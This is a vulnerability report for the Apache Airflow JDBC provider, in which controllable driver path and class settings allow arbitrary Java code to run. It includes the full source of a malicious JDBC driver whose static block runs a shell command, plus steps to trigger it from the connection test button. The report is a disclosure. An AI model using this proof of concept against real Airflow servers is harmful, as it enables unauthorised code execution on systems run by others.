jdbc apache airflow provider code execution vulnerability

In airflow.providers.jdbc.hooks.jdbc.JdbcHook, A privilege escalation vulnerability exists in a system due to controllable `Driver Path` and `Driver Class` parameters which cause executing any java code. Vulnerability reproduction steps: 1. create a malicious jdbc driver, like this ``` import java.io.*; import java.sql.*; import java.util.Properties; import java.util.logging.Logger; public class Test implements Driver { static { try { cmd(); DriverManager.registerDriver(new Test()); } catch (Exception e) { e.printStackTrace(); } } @Override public Connection connect(String url, Properties info) throws SQLException { return null; } @Override public boolean acceptsURL(String url) throws SQLException { try { cmd(); } catch (IOException e) { throw new RuntimeException(e); } // 验证URL是否为该驱动程序所支持的URL return url.startsWith("jdbc:mydb:"); } @Override public DriverPropertyInfo[] getPropertyInfo(String url, Properties info) throws SQLException { return new DriverPropertyInfo[0]; } @Override public int getMajorVersion() { return 1; } @Override public int getMinorVersion() { return 0; } @Override public boolean jdbcCompliant() { return false; } @Override public Logger getParentLogger() throws SQLFeatureNotSupportedException { return null; } public static void cmd() throws IOException { String[] cmd = {"sh", "-c", "whoami"}; Process p = Runtime.getRuntime().exec(cmd); InputStream in = p.getInputStream(); BufferedReader reader = new BufferedReader(new InputStreamReader(in)); File outputFile = new File("/tmp/airflow-jdbc.txt"); BufferedWriter writer = new BufferedWriter(new FileWriter(outputFile)); String line; while ((line = reader.readLine()) != null) { writer.write(line); writer.newLine(); } writer.close(); } } ``` generate a jar package. 2. config jdbc connection Go to the Connection configuration page. Fill in the `driver path` with the path of jar package generated in the previous step. Fill in the `driver class` with the value of Test. 3. click on the test button Click on the test button and it can be observed that the command is executed and a file named airflow-jdbc.txt is generated in the /tmp directory. This is a screenshot of my email exchange with Airflow developers: ███